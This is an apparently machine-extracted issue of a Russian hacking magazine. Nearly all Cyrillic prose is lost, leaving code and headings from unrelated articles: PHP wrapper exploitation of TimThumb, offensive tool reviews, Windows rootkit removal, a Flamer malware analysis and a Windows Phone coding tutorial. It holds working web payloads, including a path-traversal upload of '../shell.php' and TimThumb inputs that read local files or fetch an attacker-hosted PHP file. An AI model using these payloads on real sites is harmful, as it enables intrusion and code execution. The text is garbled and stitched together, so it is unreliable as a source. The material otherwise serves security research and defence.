test.php?a =1 ([a_] => 1
)
Array
test.
(
php?a%00b=1 [a] => 1
)
IIS 7.5 +
Phalanger 3.0
Array
(
[a%] => 1
)
Array
(
[a ] => 1
)
Array
(
[a b] => 1
)
HipHop
Array
(
[a%] => 1
)
Array
(
[a_] => 1
)
Array
(
[a] => 1
)
Quercus on
Resin <= 4.0.26
Array
(
[a ] =>
)
Array
(
[a ] => 1
)
Array
(
[a b] => 1
)
2.
08 /163/ 2012
PHP

.
HTTP-,
POST http://127.0.0.1:8080/test/file.php HTTP/1.1
Content-Type: multipart/form-data;
boundary=---------------------------101412320927450
Content-Length: 228
-----------------------------101412320927450
Content-Disposition: form-data; name="test";
filename="../shell.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
-----------------------------101412320927450--
advisory: bit.ly/MFeJYu. .
Null-byte
Path Traversal
Quercus.
null-byte,
(, jpg),
. , ,
.
Script #1
(resin 3.1.12)
Script #1
(resin 4.0.26)
Script #2
True
False
False
True
False
True
True
True
False
True
True
True
True
True
-1
False
True
True
"1"
False
False
True
"0"
False
False
True
"-1"
False
False
True
Null
True
True
True
array()
True
True
True
"php"
False
False
True
""
False
False
True
3.

: (jpg, png
gif), , .
, null-byte
null-byte,
.jpg. , .jpg .
.

<?php
if(isset($_FILES["image"])) {
if(!preg_match('#\.(jpg|png|gif)$#',
$_FILES["image"]["name"])) {
die("Hacking attempt!");}
copy($_FILES["image"]["tmp_name"],
"./uploads/".$_FILES["image"]["name"]
);
}
?>
PHP ( ,
), :
;
( );
;
Path Traversal .
-
PHP. Quercus,
. : HipHop - PHP. z
WWW
POSITIVE HACK DAYS 2012

Positive Hack Days 2012. ,
PHDays ,

.
PHDays
,

DEF CON Black
Hat .
08 /163/ 2012
:). PHDays ,
,

- -
. ,

, slidesha.
re/Nl2VLF.
,

(www.phdays.ru).

-
Positive Technologies
advisory:
bit.ly/MFeJYu.
063
, Positive Technologies (amoskvin@ptsecurity.ru)
1 (2)
PHP

, .

wrapper ,

, ,
. , , , .
WRAPPER'

Positive Hack Days
2012
INTRO
, PHP
, . OWASP TOP 10 WASC TCv2.
, , ,
( ).
, PHP wrappers
.
, ,
.
064
PHP , (Streams), 4.3.0.

, ,
, .
, , . , , .
fopen. ,
:
resource fopen ( string $filename , string $mode
[, bool $use_include_path = false [, resource $context ]] )
$filename . ,
:
$handle = fopen($file, "rb");
while (!feof($handle))
{
$contents .= fread($handle, 8192);
}
print $contents;
(wrapper). ,
, . , fopen
:
FTP:
ftp://user:password@10.0.0.1/pub/file.txt;
, , server-status/serverinfo IP: http://127.0.0.1/server-status;
,
(PHP >= 5.3.6): php://fd/XXX;
OS (
expect): expect://ls.
08 /163/ 2012
( )
, . , ,
.
, - , .

read. ,
.
, copy()
,
php://output, .
, copy()
, .
copy('/etc/passwd' , 'php://output');
file_put_
contents ,
write:
file_put_contents('php://output',
file_get_contents('/etc/hosts'));
PHP 5.3.6 php://fd, . PHP

Apache, php://fd
access_log/error_log (
644,
root).
, PHP ,
, stream_wrapper_register.
PHP (bit.ly/
PbdGFT).
phpinfo Registered PHP Streams.
,
. .
ZIP?
ZIP .
,
. PHP
zip.
Linux- zip , PHP
--enable-zip.
, ;
, , , /.
zip
: , zip-.
zip-
$zip = new ZipArchive;
if ($zip->open('/tmp/any_name_zip_arxiv',1))
{
$zip->addFromString( '/my/header.html',
'<?php print_r(ini_get_all());' );
}
$zip->close();
zip- , zip:// .
08 /163/ 2012
Registered PHP
Streams
https, ftps, compress.xlib, compress.bzip2, file, glob,

data, http, ftp, zip, phar
Registered Stream
Sockrt Transport
tcp, udp, unix, udg, ssl, sslv3, sslv2, tls
Registered Stream
Filters
zlib.*, bzip2.*, convert.iconv.*, string.rot13, string.

toupper, string.tolower, string.strip_tags, convert.*,
consumed, dechunk
Registered PHP Streams phpinfo()
zip-
print file_get_contents(
'zip:///tmp/any_name_zip_arxiv#/my/header.html');
, , Remote
File Include, null-.
:
$s = $_POST['path'];
include $s.'/header.html';
,
. http://, ftp://, data://
allow_url_include,
null-
magic_quotes_gpc. ,
allow_url_include=Off magic_quotes_gpc=On
.
, !
,
. , zip-, , PHP-,
zip://.
path=zip:///tmp/any_name_zip_arxiv#/my
PHP, ,
PHP HTML-.
phpinfo().
, LFI/RFI,
rdot.org. , allow_url_fopen zip://.
WHERE IS MY DATA://?
data://
-.
. RFC 2379,
:
dataurl
:= "data:" [ mediatype ] [ ";base64" ] "," data
mediatype := [ type "/" subtype ] *( ";" parameter )
data := *urlchar
parameter := attribute "=" value
mediatype ,
:
data://anytype/anysubtype;myattr!=V@l!;youattr?=Op$;base64
. , TimThumb v1.x
:
065

function validate_url ($url) {
$pattern="/\b(?:(?:https?):\/\/|www\.)
[-a-z0-9+&@#\/%?=~_|!:,.;]*[-a-z0-9+&@#\/%=~_|]/i";
return preg_match ($pattern, $url);
}
:
data://text/plain;charset=http://w?param=anyval;base64,
SSBsb3ZlIFBIUAo
PHP , stream_get_meta_data().
,
:
,
parse_url, . ,
, ,
img.youtube.com.
$url_info = parse_url($_POST['src']);
if ($url_info['host'] === 'img.youtube.com') {
$name = str_replace('/', '',
substr($url_info['path'], 4));
copy( $src, './'.$name );
}
img.youtube.com :
array stream_get_meta_data ( resource $stream )

POST DATA: src=http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg

,
.
data://
! ? :
$password = 'secret';
$file = $_POST['file'];
$fp = fopen( $file, 'r');
extract(stream_get_meta_data($fp));
if ( $mediatype === 'text/plain') { ... }
if ( $_COOKIE['admin'] === $password) { ... }
$file data,
POST DATA: file=data://text/plain;password=mysecret;base64
$password ,
, .

compress.zlib://.
POST DATA: src=compress.zlib://img.youtube.com/../path/to/
local/file;
,
data://:
POST DATA: src=data://img.youtube.com/
aaamy.php?;base64,SSBsb3ZlIFBIUAo

: , .
, data://
compress.zlib:// ,
.
TimThumb.
Cookie: admin=mysecret
TIMTHUMB V1.X

! :). .
PHP ,
prase_url(). , URL. :
URL, :
TimThumb ,
WordPress. 2011 TimThumb v 1.32
,

PHP- (bit.ly/n8YdTd). ,
(bit.ly/qRrUpF).
,
URL ,
. , blogger.com,
, URL
, blogger.com.attacker.com,
.
print_r(parse_url(
'anysheme://anysite.com/;http://w?v@l=!'));
http://www.target.com/timthumb.php?
src=http://blogger.com.attacker.com/pocfile.php
, compress.zlib:// gz-.
, zlib-,
.
, /etc/hosts :
readfile('compress.zlib:///etc/hosts');

1.32 (revision 142).
. , 1.34 (revision 145):
data://
066
function check_external ($src) {

......................
$filename = 'external_' . md5 ($src);
08 /163/ 2012
2. getimagesize , .
, .
$local_filepath, , php://filter, compress.zlib://.
unlink .
, .
, .
src=http://www.youtube.com/?local_filepath=php://filter/
resource%3D./cache/test.php&url_info[host]=
img.youtube.com&src=http://site.com/thumb.txt
1. 149- ,
. parse_str . , URL,
$src.
curl_init , file_get_contents/file_put_contents.
, , curl_init,
PHP .
WordPress
$local_filepath = DIRECTORY_CACHE . '/' . $filename;

if (!file_exists ($local_filepath)) {
if(strpos(strtolower($src),'http://')!==false||
strpos(strtolower($src),'https://')!==false){
if (!validate_url ($src))
display_error ('invalid url');
$url_info = parse_url ($src);
......................
if($url_info['host']=='www.youtube.com' ||
$url_info['host'] == 'youtube.com') {
parse_str ($url_info['query']);
......................
if (function_exists ('curl_init')) {
......................
$fh = fopen ($local_filepath, 'w');
$ch = curl_init ($src);
.....................................
curl_setopt ($ch, CURLOPT_URL, $src);
......................
curl_setopt ($ch, CURLOPT_FILE, $fh);
curl_setopt ($ch, CURLOPT_WRITEFUNCTION,
'curl_write');
.......................................
$file_infos = getimagesize ($local_filepath);
if (empty ($file_infos['mime']) ||
!preg_match ("/jpg|jpeg|gif|png/i",
$file_infos['mime'])) {
unlink ($local_filepath);
touch ($local_filepath);
......................
, check_
external :
1. parse_str
.
, ,
: $url_info['host'], $src, $local_filepath. .
08 /163/ 2012
if(!$img = file_get_contents($src)) {
display_error ('remote file for ' .
$src . 'can not be accessed.
It is likely that the file
permissions are restricted');
}
if(file_put_contents($local_filepath,
$img) == FALSE) {
display_error ('error writing
temporary file');
}
, data://
:
data://img.youtube.com/e;charset=
http://w?var=;base64,SSBsb3ZlIFBIUAo
compress.zlib://
:
compress.zlib://youtube.com/../http://?/../../path/to/
local/file
, , RCE
data, ,
compress.zlib.

, PHP File Manipulation.
,
file_exists, is_file, filesize . Suhosin
, allow_url_include On.

php://filter
-. Stay tuned! z
067
D1g1 , Digital Security (twitter.com/evdokimovds)
X-Tools

:
Chris Shields, Matthew Toussain
URL:
kinozoa.com
:
*nix
:
Georges Bossert,
Frederic Guihery
URL:
www.netzob.org
:
*nix
:
Matt Graeber
URL:
https://github.com/
mattifestation/PowerSploit
:
Windows

MITM-

RE
POWERSHELL POST-EXPLOITATION
Subterfuge ,
, Python.

,
ARP (Address Resolution Protocol) .
:
Netzob
,
-, .

:
/ ;

(IDS, IPS, );
.
,
,
,
,
.
.

: NeedlemanWunsch
;
(UPGMA); L*m Dana
Angluin.
PowerSploit Microsoft
PowerShell ,

. PowerSploit
:
;
;
;
HTTP;
;
Race Condition;
DNS-;
Evilgrade;
.
HTTPS- ,

, PPTP,
Cisco IPSec, L2TP, OpenVPN, SSH,

, .

.
068
Inject-Dll;
Inject-Shellcode;
Encrypt-Script;
Get-GPPPassword;
Invoke-ReverseDnsLookup.
,
DLL - , Group Policy
IP-
PTR- DNS,
.

,
PowerShell PE- , reverse engineering
, C#.

: www.exploit-monday.com.
08 /163/ 2012
:
SkyLined
URL:
code.google.
com/p/alpha3
:
Windows
:
Joxean Koret
URL:
zerowine.sourceforge.
net
:
Windows
LPHANUMERIC -
ALPHA3 Python
SkyLined,
x86 x64 . ?

: ,
, .
ALPHA3 .
:
, ,
,
- .
:
ohdae
URL:
ohdae.github.com/
Intersect-2.5
:
*nix
POST-EXPLOITATION
LINUX
Zero Wine ,
OC Windows.
Zero Wine
(
WINE)
,
. :
Intersect
Linux,
Python.
,
, ,

.

,
.

command-line Intersect,

.

30
4 ,

:
raw trace ,
WINE;
;
;
API- .
Zero Wine
Debian QEMU,

-.
: ,
. ,

(, Armadillo),
WINE .
08 /163/ 2012
;
;
;
.
.
-

. :
ALPHA3.py ascii EDI --input="file"
> shellcode.txt

,
,
-

( EDI).

,
- :
ascii, cp437, latin-1, utf-16.
:
rohitab.com
URL:
www.rohitab.com/
apimonitor
:
Windows
6
API-
API Monitor
API-,
.
,
.
:
64- Windows;

;
10 000 API-
600 COM-;
COM;
;
;

;
;
;
;
;
DLL;
.
,
.
.
069
MALWARE
(drobotun@xakep.ru)

,

?

,
. , ,
.

.
,
,
: ,

070

:
, , ;
, , ;
.
, , ,
,
.

.

, , . ,
,
.
, :
-
,
;
,
;
, .
08 /163/ 2012
, , , - , , - -
,

, ,
,
.
,

. 72

,
?
. 74

. ,
,
hosts,

, . .
. 73

.

.
?

. ?
. , ,
, ,
, .
,
lsas, services, system, winlogon,
svchost, csrss .
, %windir%\system32\ ( explorer.exe, ,
, %windir%\). , , .
, .
,
. ,
, , ,
"svshost" .
,
. .
, Process
Explorer SysInternals ProcessHacker,
Kernel Detective
. ,
( ,
WinDbg).
, , , ,
, .
, ( ,
, ), ,
-
.
08 /163/ 2012
.
? (
)

Kernel Detective,
, API NtQuerySystemInformation.
, - ,
,
071
MALWARE

.

. ?

(
,
- ).
?
.
,

. ,
, hosts,
, . .
.
?

,

(,

).
?

. ?
. , ,
(,
,
). . , Handle
SysInternals , .
, ,
WinObj SysInternals
Suit.
, .
, , , , - (
svchost.exe explorer.exe),

(
explorer.exe, winlogon.exe).
,
- .
, SysInternals
TcpView,
, TCP UDP-.
, ,
, .
072

.

- , ,

ntdll.dll!LdrLoadDll
kernel32.dll!LoadLibrary
ntdll.dll!EnumerateValueKey
ntdll.dll!EnumerateKey
advapi.dll!RegEnumKey
advapi.dll!RegEnumKeyEx
advapi.dll!RegEnumValue
ntdll.dll!OpenProcess
ntdll.dll!OpenThread
ntdll.dll!NtQuerySysteminformation
ntdll.dll!RtlGetNativeSystemInformation
kernel32.dll!Process32Next
kernel32.dll! CreateToolhelp32Snapshot
ntdll.dll!NtQueryDirectoryFile
ntdll.dll!NtCreateDirectoryObject
ntdll.dll!NtOpenDirectoryObject
ntdll.dll!QueryInformationFile
ntdll.dll!OpenFile
ntdll.dll!CreateFile
kernel32.dll!FindNextFile
kernel32.dll!CopyFile
kernel32.dll!MoveFile
kernel32.dll!DeleteFile
,
,

API-,
08 /163/ 2012
. 76
PID

, taskkill.
?
. 75
.
?
(
, ,
,
).
?
-
, Process
Hacker Kernel
Detective. ?
,
. ?

.
? (
)
Process
Hacker Process
Explorer

. ?

.
?

,
.

. , , hosts,
,
. .
, , ,
, explorer.exe,
, , .

, . ( )
explorer.exe
08 /163/ 2012
. 74
, , (
, , ,
).
, ,
. - .
Autoruns SisInternals (
).
,
.
,
, . ,
. , Autoruns
. Process Explorer
- ,
() .
: (
Suspend), , , , ,
.

.
073
MALWARE

. ?
Unlocker
-
.

. ?
.
?

explorer.exe ( WinDbg)

(. ).
?

(
)

.
.
. ,
, hosts,
, . .
API.

API ( ,
). ,
- .

, .
. ,
,
.
,
.
, ,
, , , Kernel
074

.
?
,
.
()

.
Detective .
.
, ,
. ,
ntdll.dll
EAX ,
, , :
MOV edi, edi
PUSH ebp
MOV ebp, esp.
,
.
: , , ,
, .
LiveCD, ,
, .
, :). z
08 /163/ 2012
,
,
API-

. ,
, hosts, , . .

, ,
- Autoruns
SisInternals.
(
, WinDbg)
,

.

advapi32.dll, ,
. ?
. 74

.
?
Process
Hacker Process
Explorer

. ?
. ?

.
?

Windows
,
.

, .
Task Manager, VBA Excel
(
Task Manager ),
Process Explorer Process Hacker.
.
Process Explorer
( , ).
,
,
, ()
(,
)
.
08 /163/ 2012
,
, Windows,
.
.
API- ,
API-
.

,
.
Process Hacker ,
,
.

,
(
,
).
075
MALWARE
.
TcpView SisInternals.

explorer.exe,
winlogon.exe, svchost.exe.

IP-?
? (: svchost.exe
winlogon.exe, winint.exe,
csrss.exe, lsass.exe )

API-
. ?
.
, , hosts, , . .
. (3)
.
?
, .
?
.
?
, ,
.
, -

?..

. msconfig,
,
HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKLM\Software\
Microsoft\Windows\CurrentVersion\Run. ,
,
,
, Windows.
Autoruns SisInternals Suit.
, ,
. GUI, , . -
076
, ( Run, RunOnce,
) Internet Explorer
(BHO, ),
( 11.0).
, , . ,
API-, Autoruns
. , , ,
Autoruns - WinDbg,
, F5,
API-.
08 /163/ 2012
DVD

(, , )
RootkitRevealer
SysInternals.
.
( MFT Master File Table NTFS-
) ,
API-.
.

,
API-
.
,

API-.
BlackLight F-Secure

.

( PID).
+ ,
,
.
+

API-

Autoruns.
INFO

,
139-
,

WARNING
,
,
.

GMER. ,
, ,
.
, , ,
TCP/IP-.
- .
,

AVZ.
,
- .
, ,
.
GMER
08 /163/ 2012
,

(,
,

)
.

,
!
WWW
AVZ ,
, :

;
;
;
;
;
;
Winsock SPI/LSP-;
, ;
;
;
TCP/UDP-;
;
NTFS-;

.
, , .
, ( ,
, ) - ( ),
.
-
,
www.processlibrary.
com.
www.nobunkum.
ru/ru/rootkitswindbg

WinDbg

Esage
Lab.
www.esetnod32.
ru/.support/winlock,
sms.kaspersky.ru
www.drweb.
com/xperf/unlocker

.
077
MALWARE
, Symantec
FLAMER

,
!
W32.Flamer, sKyWIper,
Flame,
-
.
,
,
,
( ,
).
.
? , . , Flamer

,

- .
, .
078
,
Flamer ,
. , , ,
Flamer
- .
.

,
.
,

. , ,
. , ,
, , , , . ,

- .
28 2012 MAHER -
(Iran National CERT, www.

certcc.ir/index.php?newlang=eng),
2010
Stuxnet Duqu,
Flamer,
43
. (bit.ly/LL9NTu)
,
.
, 28 ,

Flame ,
International Telecommunication Union
(ITU), .
,
28 2012 ,
(Laboratory of Cryptography and System
Security, CrySyS Lab, www.crysys.hu),
Symantec,
08 /163/ 2012
, !

, sKyWIper (www.crysys.hu/
skywiper-statement.html). (. 1.03), 62 (www.crysys.
hu/skywiper/skywiper.pdf), , , Duqu
Stuxnet,
C&C-,
.
, sKyWIper ,
Flame ( )
Flamer (MAHER).
Symantec
Flamer (www.
symantec.com/en/uk/security_response)
27.05.2012 19:00 (UTC).

Symantec Flamer
.

( ).
, ( ,
).

Flamer ,
, 2010 .

, .
.
, Flamer
Stuxnet .
Flamer ,
,

.
-, SQL
SSH.
Lua-,

.
Flamer

Microsoft Windows.
Flamer
.
,
, ,
autorun.inf. CVE-2010-2568,
Stuxnet, CVE-20102729. , Flamer (a man-in-the-middle, MITM),
Windows
Update.
,
MD5, ,
08 /163/ 2012

Microsoft Root Authority.

Flamer .
,
Flamer .
:
advnetcfg.ocx,
ccalc32.sys,
mssecmgr.ocx ,
msglu32.ocx,
boot32drv.sys,
nteps32.ocx.

advnetcfg.ocx.
2010 , 2011-.
ccalc32.sys
, , advnetcfg.ocx.
Flamer ,

. 150
, . 1. ,

,
.

Flamer , ,
-,
.
6 ,
20 . Lua-,

,
(). 62 , ,
C&C-
.
,

, .

Flamer, , mssecmgr.ocx.
, 3.
,
,
, mssecmgr.
ocx.
,

. ,

.1.

DLL- : advnetcfg.
ocx, nteps32.ocx, boot32drv.sys, msglu32.ocx,
soapr32.ocs, jimmy.dll, 00006411.dll .
, HTTP-, SOCKS-,
SSH, SQLite , , Lua-.
Lua ,
. , ,
,
. Lua
, Flamer.
mssecmgr.ocx , ,
.
-,
advnetcfg.ocx, ccalc32.sys.
ccalc32.sys RC4
128- .
ccalc32.sys, ,
Windows kernel32.dll,
.
advnetcfg.ocx , .
mssecmgr.ocx nteps32.
ocx advnetcfg.ocx,
nteps32.ocx shell32.dll.
( ) DLL ,
winlogon.exe
.
Windows , Windows:
HKEY_LOCAL_MACHINE\SYSTEM\Current
ControlSet\Control\Lsa\"Authentication
Packages" = "mssecmgr.ocx"
nteps32.ocx
mssecmgr.ocx Lua.

. (
FLAME.) -
079
MALWARE
.

.
( ,

):
ATTACKOP
;
CASAFETY ;
CRUISE ;
EUPHORIA LNK ;
BEETLEJUICE Bluetooth-;
SUICIDE Flamer ;
MUNCH HTTP-;
VIPER ;
FLASK ;
MICROBE ;
GATOR C&C-.
. ,
ATTACKOP soapr32.ocx.
,
RC4.
,
.

.
mssecmgr.ocx
~DEB93D.tmp,
Wiper,
. Wiper

.

Flamer.

,
.

,
-
. ,
.
Flamer USB-,
,
() .

Flamer .
Flamer -
080
.
,
:
, ,
;
Microsoft Windows Print
Spooler Service Remote Code Execution
Vulnerability (CVE-2010-2729), Stuxnet;
, autorun.
inf, Stuxnet;
, ,

USB-,
Microsoft Windows Shortcut 'LNK/PIF' Files
Automatic File Execution Vulnerability (CVE-20102568), Stuxnet;
Windows Update
(MITM).

,
,
, .
USB

Windows,
. , , C:\My\Very\Long\
Directory\Path,
C:\MyJunction,
.

. Flamer , .
,
, My Docs.
Flamer :
, ,
mssecmgr.ocx,
desktop.ini,
target.lnk.
Desktop.ini Windows,
. Flamer
ShellClassInfo desktop.ini,
.

,
.
Flamer
.
CLSID
ShellClassInfo.
CLSID My Docs
,
target.lnk,
.
,
My Docs, Windows
Explorer, , , target.
lnk. ,
My Docs, target.lnk
desktop.ini,
Flamer (mssecmgr.ocx).
Flamer
.
Flamer
. .lnk
, Flamer ( Stuxnet)
Microsoft Windows
Shortcut 'LNK/PIF' Files Automatic File Execution
Vulnerability (CVE-2010-2568). target.lnk, Flamer , ,
. , Windows
, ,
target.lnk (mssecmgr.ocx). Flamer .
1.
, ,
.

Flamer , , .

.
; ,
, . ,
, GPS- .
SQLight %Temp%
.

Sony Ericsson Nokia, Flamer .
08 /163/ 2012
, !
.2.
.3.
2. Windows
, .
3. Flamer lnk-, .
NetBIOS WPAD ,
.
wpad.dat, - ,
Flamer.
-
.
MUNCH -
Flamer,
. MUNCH
,
URL- Windows Update.
, MITM .
Windows Update ,
Microsoft. Flamer
, , Microsoft Root Authority
. Microsoft
Terminal Server Licensing.
Microsoft
Terminal Services Licensing,
Microsoft
Terminal Services.

Microsoft Enforced Licensing Intermediate
PCA, , ,
Microsoft Root Authority.

,
. Flamer
Microsoft.
( Microsoft
Security Advisory 2718704
, ,
.)

Windows XP, Windows
Vista Windows 7 Microsoft
Hydra.

man-in-the-middle (MITM, ) Windows Update

Flamer
Windows
Update
. : SNACK,
MUNCH GADGET.
Internet Explorer,

-.
Web Proxy Auto-Discovery Protocol
(WPAD). Internet Explorer
(wpad.dat)
. ,
computerA.group.company.com, Internet
Explorer wpad.dat :
wpad.group.company.com,
wpad.company.com.
IP-
DNS. DNS
, Internet Explorer WINS NetBIOS.
NetBIOS
peer-to-peer ,
.

. ,
, , , .
SNACK ,
NetBIOS-
.
WPAD-,
Flamer , WPAD,
WPAD- (wpad.dat). -
08 /163/ 2012
, MD5.
,
MD5 ,
.
Flamer Windows
Update, GADGET MUNCH , ,
Microsoft.

, Windows Update.
Flamer, .

TumblerEXE.exe.
Tumbler
,
. Tumbler ,
,
, Flamer, HTTP
URL- :
[http://]MSHOME-<STRING>/view.php?mp=1&
jz=<STRING>&fd=<STRING>&am=<STRING>&ef=
<STRING>&pr=<STRING>&ec=<STRING>&ov=
<STRING>&dd=<STRING>
MUNCH Flamer
mssecmgr.
ocx, Tumbler %Windir%\
temp\~ZFF042.tmp .
.
Flamer.
BLUETOOTH
Flamer Windows, Bluetooth. BeetleJuice,

, .
,
.
Bluetooth-.
081
MALWARE

, ,
.

Bluetooth-. , ,
Flamer, ,
Bluetooth- .
Bluetooth- Flamer
description.
Bluetooth, .
,
Bluetooth-.
,
,
. Bluetooth-

,
.

(
/
) , .
C&C-
80 , C&C-,
, IP.
() .
2012 C&C-,
,

browse32.ocx, Flamer
.
09 2012 .
browse32.ocx :
1. EnableBrowser ,
(, ,
) .
2. StartBrowse ,
Flamer.

, Flamer.
,

, . ,
.

.
,
, Flamer
SUICIDE . ,
SUICIDE,
Flamer
.
,
,

, ,

(!)
.
! z
, FLAMER
:

( )

:
IP-
Gateway
Proxy

DHCP
DNS

Hosts

Wi-Fi
082
Microsoft Outlook
Remote Access Services
CoreFTP
CureFTP
EmFTP
FTP Explorer
Mssh
NetserveFTP
RAdmin
RoboFTP
Softx FTP
South River WebDrive
TeamViewer
VNC

:

Bluetooth,

:
MS Word
MS
PowerPoint
MS Excel
MS Publisher
Microsoft Outlook
Express
Microsoft Outlook
Microsoft
Outlook appointments

Microsoft Outlook
MS Visio
MS Access

AutoCAD
PDF-
JPEG
Bitmap
TIFF
PNG
GIF
URL-
CSV-
LNK-
ORA-
RDP-
RTF-
SSH-
SSH2-
TXT-
:

GPS-
GPS-
GPS-

:
Ace FTP
BitKinex
Bulletproof FTP
CyD FTP
Dameware
Innosetup
Intersoft SecureKeyAgent
Ipswitch WSFTP
JaSFTP
Jildi FTP
Netserve FTP
PenguiNet
RageWork
SecureCRT
SmartFTP
VNC

:
NetBIOS/SMB
Yahoo mail
Yahoo Rocketmail
Yahoo Maktoob
Gawab
Google mail
Microsoft Live
Microsoft Hotmail
,
.
08 /163/ 2012
Preview
90
,
,
,
. ,

.
, AES.
?
,
, .
84
WINDOWS PHONE 7.5

, , , JSON
MS.
UNIXOID
120

, Google, Ubuntu Linux 8-
.
08 /163/ 2012
UNIXOID
98

Dart, Google

JavaScript?
SYN/ACK
128

HOWTO ,

.
114
LINUX MINT

,

Distrowatch.com?
FERRUM
132
SSD
HDD
SSD
.
, ?
083
yurembo (yazevsoft@gmail.com)
Windows Phone 7.5

Windows Phone 7.5
,
SDK 7.1.
,

.
084
08 /163/ 2012
Windows Phone 7.5
Microsoft
.
,
256 .
512 .
.
, Windows Phone
,
Microsoft Windows
Phone.
API, , , . SDK (7.0)
.
.
1.
, . , . Visual Studio
2010, Windows Phone Application
Silverlight. . . :
VibrateController.Default.Start(TimeSpan.FromSeconds(5));
. , VibrateController.Default.Stop().
,
API . Microsoft.Devices;
, .
2.

. : . ,
:
FMRadio myRadio = FMRadio.Instance;
myRadio.CurrentRegion = RadioRegion.Europe;
myRadio.Frequency = 103.9; // ,
// , :)
myRadio.PowerMode = RadioPowerMode.On;
FMRadio .
, : Europe, Japan United States.
:). . .
( ?) ,
Windows Phone , .
, : myRadio.PowerMode
= RadioPowerMode.Off. ,
.
3.
Windows Phone ,
.
. , ,
( 1 1),
.
(
), , ,
.
, , , , , ,
, .

.
, :), : Microsoft.Xna.Framework Microsoft.
Device.Sensors (Project Add Reference). C#-
: Microsoft.Xna.
Framework, Microsoft.Devices.Sensors.
, . MainPage :
Accelerometer Acc = new Accelerometer().

. :
Acc.CurrentValueChanged += Acc_CurrentValueChanged.
TimeBetweenUpdates
, :
08 /163/ 2012
Acc.TimeBetweenUpdates = TimeSpan.FromMilliseconds(100).
, :
void Acc_CurrentValueChanged(object sender,
SensorReadingEventArgs<AccelerometerReading> e)
{
var position = e.SensorReading.Acceleration;
Dispatcher.BeginInvoke(() =>
{
xpos.Text = position.X.ToString("0.0");
ypos.Text = position.Y.ToString("0.0");
zpos.Text = position.Z.ToString("0.0");
});
}
position , ;
, .
Vector3.

( Dispatcher).
, Silverlight
:
. Dispatcher,
BackgroundWorker. Silverlight
Microsoft ( ), Bing :),
Windows Phone. ,
085

BeginInvoke , , .

( , ),
, ,
Dispatcher ( ,
).
,
, .
: Acc.Start().
: Acc.Stop().
,
, (. 1).
. 1.
4.
,
, ,
.

. C#-
, .
Accelerometer
Compass.
.
CurrentValueChanged:
void comp_CurrentValueChanged(object sender,
SensorReadingEventArgs<CompassReading> e)
{
var position = e.SensorReading.MagneticHeading;
Dispatcher.BeginInvoke(() =>
{
xpos.Text = position.ToString();
});
}
. .
, ; ,
.
WINDOWS PHONE 7.5

.
,
Windows
Phone (. ),

,

, , ,
.
,
.
,

,
.

,

.
5. XML
XML ,
, Windows Phone .
, .NET.
, 7.5 XML-
.
, XML.
, , XML,
.
, - , -
086
,
,
.
, , , .
System.Xml
System.Xml.Serialization. : System.IO, System.IO.IsolatedStorage, System.Xml,
System.Xml.Serialization.
- -
08 /163/ 2012
Windows Phone 7.5
- .
XML-
( -).
: . ,

, :
public class UserData
{
public string FirstName { get; set; }
public string LastName { get; set; }
public string NickName { get; set; }
}
,
. ,
, , .
,
UserData
:
var record = new UserData();
record.FirstName = textBox1.Text;
record.NickName = textBox3.Text;
record.LastName = textBox2.Text;
using (var store =
IsolatedStorageFile.GetUserStoreForApplication())
using (var file = store.CreateFile("data.xml"))
//
{
XmlSerializer ser = new XmlSerializer(typeof(UserData));
//
ser.Serialize(file, record);
// UserData
}
:
1. ,
.
2. XML- .
3.
, -.
4. , .
using, ,
.

.
, , IDisposable.
Dispose .
:
UserData record = null;
using (var store =
IsolatedStorageFile.GetUserStoreForApplication())
using (var file = store.OpenFile("data.xml", FileMode.Open))
{
XmlSerializer ser = new XmlSerializer(typeof(UserData));
var reader = XmlReader.Create(file);
if (ser.CanDeserialize(reader))
{
record = (UserData)ser.Deserialize(reader);
textBox1.Text = record.FirstName;
textBox2.Text = record.LastName;
textBox3.Text = record.NickName;
}
}
:
, ,
data.xml, , ,
. , ,
, Text .
. ,
. ,
.
6. JSON
JSON (JavaScript Object Notation) , XML,
,
,
.
JavaScript ( ),
. JSON
, XML, ,
UserData:
{ "FirstName" : "Yuriy", "LastName" : "Yazev",
"NickName" : "yurembo" }
, XML :).
:
JSON.
, ,
UserData. DataContractJsonSerializer,
08 /163/ 2012
JSON-,
SystemServicemodel.Web,
: System.IO, System.IO.IsolatedStorage, System.
Runtime.Serialization.Json. . - ,
.
:). -,
json
xml. ,
. -, XmlSerializer
DataContractJsonSerializer. -,
WriteObject Serialize.
, -, ReadObject Deserialize.
( ).
, / .
087
7.

Windows Phone 7.5,
. ,
,

Microsoft.
,
XML-,
, .
, Windows
Phone Microsoft SQL Server Compact.

.

. SQL Server
Transact-SQL, ADO.NET. LINQ.
Microsoft, LINQ
. SQL ?
? , SQL , ( 70- ) , . ,
( , ,
:)), . SQL
Server Compact: , .
- ,
.
. 2.
088
, .
,
MMOg. ,
: ,
, .
System.Data.Linq,

LINQ. .
: ,
Visual Studio ,
XAP-
. , , ,
. ,
, ,

?
Tools Connect to Database. , Microsoft SQL Server Compact 3.5,
Add Connection. Connection Properties
Database
sdf (. 2).
Create
, .
, K, .
, Server Explorer
. , Tables
Create Table.
(. 3).
,
ID, . Server Explorer
Players Table Properties.
Add Relations, Relation Name
(, ID_REL), Primary Key Table
(Users), Foreign Key Table
,
. 3. Users
08 /163/ 2012
Windows Phone 7.5
Players. Primary Key Table Column Foreign Key Table

Column ID.
Add Columns, Add Relation.
. K
.
, SQL Server Compact ,
, ,
. : Microsoft Visual
Studio Visual Studio Tools Visual Studio Command Prompt (2010).
: cd C:\DB, :
sqlmetal gameDB.sdf /code:gameDB.cs /pluralize
,
, ,
Visual Studio. .
VS Solution Explorer, ,
Add Existing Item.
(gameDB.cs).

:
.
, (Get Data)
,
, (Insert Data)
.

, :
, ( )
( Players),
, ,
, .
, , ,
, , .
: try/catch.
WWW
www.microsoft.com

Windows Phone

.
using (var db = new GameDB(DBStr))

{
if (db.DatabaseExists() == false)
// ,
{
db.CreateDatabase(); //
}
}
DVD

,
:
string DBStr = "Data Source=isostore:/gameDB.sdf". . ,

GameDB IDbConnection.
, .
,
.
,
(TextBox),
. ,
. 5.
. 4. Players
08 /163/ 2012
Windows Phone:
SDK 7.1,
, , . , ,
, , :).
.

! ,
, .
! z
089
R_T_T

2814789

,
, . , , ,
. ,
.
,
. ,
,
, .
,
.
?
,
RTT- ;).
. 32- ,
.
32- . ,
32-
?
, , ,
.
, ,
090
,
12 RTT-. ! ,
, .
,
, , 1 RTT-.
,
